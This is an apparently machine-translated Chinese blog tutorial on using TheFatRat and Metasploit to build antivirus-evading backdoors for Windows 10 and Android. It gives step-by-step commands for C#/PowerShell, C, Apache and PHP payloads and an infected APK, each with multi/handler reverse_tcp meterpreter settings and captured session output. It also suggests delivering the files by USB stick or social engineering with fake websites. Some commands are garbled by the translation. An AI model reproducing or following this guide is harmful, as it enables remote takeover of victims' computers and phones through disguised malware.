使用THEFATRAT破解WINDOWS,ANDROID,MAC(STEP BY STEP教程)

  • A+
所属分类:未分类

分享这个...
Share on Facebook

Facebook的

Tweet about this on Twitter

推特

Share on LinkedIn

Email this to someone

Pin on Pinterest

Share on Reddit

Share on StumbleUpon

使用Metasploit不再是一件困难的事情。 因为互联网上有许多资源可供使用。 这告诉了metasploit的用法。 Metasploit是攻击任何过时操作系统的常用方法。 仍有许多操作系统可以远程利用。 并且有许多反病毒无法检测到这些漏洞。 我们在谈论TheFatRat。

根据国际网络安全研究所的道德黑客研究员对TheFatRat的工作进行了详细分析,以检查测试工具的内部。

TheFatRat是另一个类似于metasploit的工具,用于轻松生成后门。 此工具用于编译一些具有一些流行负载的恶意软件,然后可用于攻击Windows,MAC,Linux等操作系统。 此工具提供了许多选项,如创建后门,受感染的dll。

整个工具已在Parrot OS上测试过 在创建了后门之后。 这些后门已在Windows 10 Build 1607android上打开。

  • 对于克隆类型https://github.com/Screetsec/TheFatRat.git
  • 然后键入cd TheFatRat
  • 输入chmod u + x setup.sh
  • 输入./setup.sh
  • 如果mono不安装类型sudo apt-get updatesudo apt-get install mono-mcs或者输入sudo apt-get install mono-devel或者输入sudo apt-get install mono-complete
  • 由于某些与mono有关的依赖项没有直接安装。 所以只需运行上面的命令。
  • 在安装阶段,它会要求在parrot OS中创建快捷方式。 只需在安装后输入y就可以像运行msfconsole一样运行fatrat。
  • 之后输入fatrat
  • 您可以使用TheFatRat提供大量选项来在目标窗口或其他平台中创建会话。

创建一个简单的漏洞来破解Windows 10: -

  • Type 6将使用pwnwinds创建fud后门。
  • 然后键入2 ,它将使用c#+ powershell创建fud后门。
  • 输入LHOST侦听器/攻击者IP地址。 键入192.168.1.12
  • 输入端口4444或任何端口号。
  • 输入后门文件名tstfile
  • 键入3以使用windows / meterpreter / reverse_tcp。
  • Enter键创建后门。
  • 后门创建后将保存在/home/user/Downloads/TheFatRat/output/tstfile.exe中
  • 要访问后门,请转到上述位置。
  • 打开另一个终端并启动msfconsole。 Msfconsole将用于处理正在进行的会话。
  • 输入msfconsole
  • msfconsole启动后使用exploit / multi / handler
  • 然后键入set payload windows / meterpreter / reverse_tcp
  • 输入LHOST 192.168.1.12
  • 输入LPORT 4444
  • 输入漏洞
  msf5> 使用exploit / multi / handler 
msf5 exploit(multi / handler)> set payload windows / meterpreter / reverse_tcp
payload => windows / meterpreter / reverse_tcp
msf5 exploit(multi / handler)> 设置LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi / handler)> 设置LPORT 4444
LPORT => 4444
msf5 exploit(multi / handler)> exploit
  • 现在在Windows 10中打开后门。 只需从此处复制粘贴到Pendrive并在Windows 10中 打开 pendrive。 您还可以使用任何社交工程技术(如Fake任何网站在几秒钟内 )将此exe传递给TARGET计算机。
  • 您必须复制两个文件tstfile.exeprogram.cs 因为这个后门是使用C#创建的
  • 然后双击 tstfile.exe
  • 当目标点击该文件时,将弹出一个弹出窗口,然后打开meterpreter会话。
  • 如下所示,meterpreter会话已在msfconsole中启动。
  msf5 exploit(multi / handler)> exploit 
[ ]在192.168.1.12:4444 [ ] 上启动反向TCP处理程序发送阶段(179779字节)为192.168.1.5
[*] Meterpreter会话1在2019-01-30 12:24:04 +0000开启(192.168.1.12:4444 - > 192.168.1.5:61050)
meterpreter> sysinfo
电脑:DESKTOP-2304ULE
操作系统:Windows 10(Build 16299)。
架构:x64
系统语言:en_US
领域:WORKGROUP
登录用户:2
Meterpreter:x86 / windows
meterpreter>
  • 上面的目标是使用Widnows 10.由于会话已经创建,攻击者可以执行各种任务。

使用其他选项(使用C代码)轻松创建后门: -

  • 类型6
  • 类型6
  • 类型6
  • 输入LHOST侦听器/攻击者IP地址。 键入192.168.1.12
  • 输入端口4444或任何端口号。
  • 输入后门文件名tstfile
  • 按Enter键创建后门。
  • 打开另一个终端并启动msfconsole。 Msfconsole将用于处理正在进行的会话。
  • 输入msfconsole
  • msfconsole启动后使用exploit / multi / handler
  • 然后键入set payload windows / meterpreter / reverse_tcp
  • 输入LHOST 192.168.1.12
  • 输入LPORT 4444
  • 输入漏洞
  msf5> 使用exploit / multi / handler 
msf5 exploit(multi / handler)> set payload windows / meterpreter / reverse_tcp
payload => windows / meterpreter / reverse_tcp
msf5 exploit(multi / handler)> 设置LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(multi / handler)> 设置LPORT 4444
LPORT => 4444
msf5 exploit(multi / handler)> exploit
  • 作为目标在Windows 10中打开恶意文件(tstfile.exe)。将启动一个meterpreter会话。
  [ ]在192.168.1.12:4444 [ ] 上启动反向TCP处理程序发送阶段(179779字节)为192.168.1.5 
[*] Meterpreter会话2在2019-01-30 15:19:28 +0000开启(192.168.1.12:4444 - > 192.168.1.5:61331)
meterpreter>
  • 正如您所见,meterpreter会话已在攻击者计算机中启动。 现在攻击者可以轻松操纵目标。

使用Apache + Powershell创建后门: -

  • 类型6
  • 输入3
  • 输入LHOST侦听器/攻击者IP地址。 键入192.168.1.12
  • 输入端口4444或任何端口号。
  • 输入后门文件名tstfile1
  • 输入3
  • Enter键创建后门。
  • 在Windows 10中打开上面创建的后门。或者欺骗目标在他们的电脑上打开上面的文件。
  • 打开另一个终端并启动msfconsole。 Msfconsole将用于处理正在进行的会话。
  • 输入msfconsole
  • msfconsole启动使用exploit / multi / handler
  • 然后键入set payload windows / meterpreter / reverse_tcp
  • 输入LHOST 192.168.1.12
  • 输入LPORT 4444
  • 输入漏洞
  • 当目标打开后门(tstfile1.exe )时,将在Windows中创建一个新会话
  [ ]发送阶段(179779字节)到192.168.1.5 [ ] Meterpreter会话3打开(192.168.1.12:4444  - > 192.168.1.5:61336)2019-01-30 15:20:01 +0000 
meterpreter>

后门之间的区别在于第一个后门使用c#+ powershell,您将文件发送到目标。 第二个后门,您只需选择创建后门的选项。 另一个后门需要设置有效负载。 第三个后门使用webserver apache来创建后门。 第三个后门为攻击者提供了强大的后门。 会话不会轻易过期。 由于上述两个会话在测试时突然失效。

使用PHP注入: -

  • 在这里,我们将使用PHP创建后门。 输入1
  • 然后输入5
  • 输入LHOST 192.168.1.7
  • 然后键入端口80
  • 输入文件名tstfile
  • 如上图所示。 这个后门使用Windows有效负载来创建会话。
  • 有效载荷创建后。 将有效负载移动到apache服务器位置。 因为这个有效载荷将使用IP地址打开。
  • 输入cp tstfile.php / var / www / html
  • 然后键入sudo serivce apache2 start
  • 然后转到目标Windows浏览器并键入192.168.1.7/tstfile.php
  • 作为目标打开上面的URL。 php脚本将在后台启动,会话将如下所示启动。

[*] Meterpreter会话1在2019-01-30 17:45:28 +0000开启(192.168.1.12:80 - > 192.168.1.5:61331)
身份信息连接
------ ------------ -----------
1 meterpreter php / linux www-data(33)@ apache2 192.168.1.7:80 - > 192.178.1.5:61331

msf exploit(处理程序)> session -i 1
meterpreter> sysinfo
电脑:DESKTOP-2304ULE
操作系统:Windows 10(Build 16299)。
架构:x64
系统语言:en_US
领域:WORKGROUP
登录用户:2
Meterpreter:x86 / windows
meterpreter>
  • 打开一个URL后。 目标很容易被黑客入侵。

攻击Android设备: -

  • 输入1
  • 键入192.168.1.7
  • 4444型
  • 后门
  • 输入3
  • Enter键创建后门。
  • 这是创建一个受感染的.apk文件
  • 我们将在android mobile中打开后门。 这里我们使用Android 4.4 Lolipop。
  • 在msfconsole中创建一个多处理程序。
  • 键入use exploit / multi / handler
  • 键入set payload android / meterpreter / reverse_tcp
  • 键入set 192.168.1.7
  • 输入set 4444
  • 输入漏洞
  msf5> 使用exploit / multi / handler 
msf5 exploit(multi / handler)> set payload android / meterpreter / reverse_tcp
payload => android / meterpreter / reverse_tcp
msf5 exploit(multi / handler)> 设置LHOST 192.168.1.7
LHOST => 192.168.1.7
msf5 exploit(multi / handler)> 设置LPORT 4444
LPORT => 4444
msf5 exploit(multi / handler)> exploit
  • 安装上面的backdoor.apk
  • 由于在android中打开了backdoor.apk,因此将在msfconsole中创建一个新会话。 根据国际网络安全研究所的数字取证专家,用户在下载任何新的Android应用程序时应该谨慎,因为它可能是android木马
 [ ]在192.168.1.7:4444 [ ] 上启动反向TCP处理程序发送阶段(70554字节)到192.168.1.12 
[*] Meterpreter会话1在2019-01-31 02:04:20 +0000开启(192.168.1.7:4444 - > 192.168.1.12:58445)
meterpreter> 帮助
核心命令
Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values guid Get the session GUID help Help menu info Displays information about a Post module irb Open an interactive Ruby shell on the current session load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session pry Open the Pry debugger on the current session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel
  • 输入sysinfo
  meterpreter> sysinfo 
电脑:localhost
操作系统:Android 4.4.2 - Linux 3.10.52-android-x86 +(i686)
Meterpreter:dalvik / android
meterpreter>
  • 由于攻击者可以利用目标android设备。

分享这个...
Share on Facebook

Facebook的

Tweet about this on Twitter

推特

Share on LinkedIn

LinkedIn

Email this to someone

电子邮件

Pin on Pinterest

Pinterest的

Share on Reddit

书签交易

Share on StumbleUpon

偶然发现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: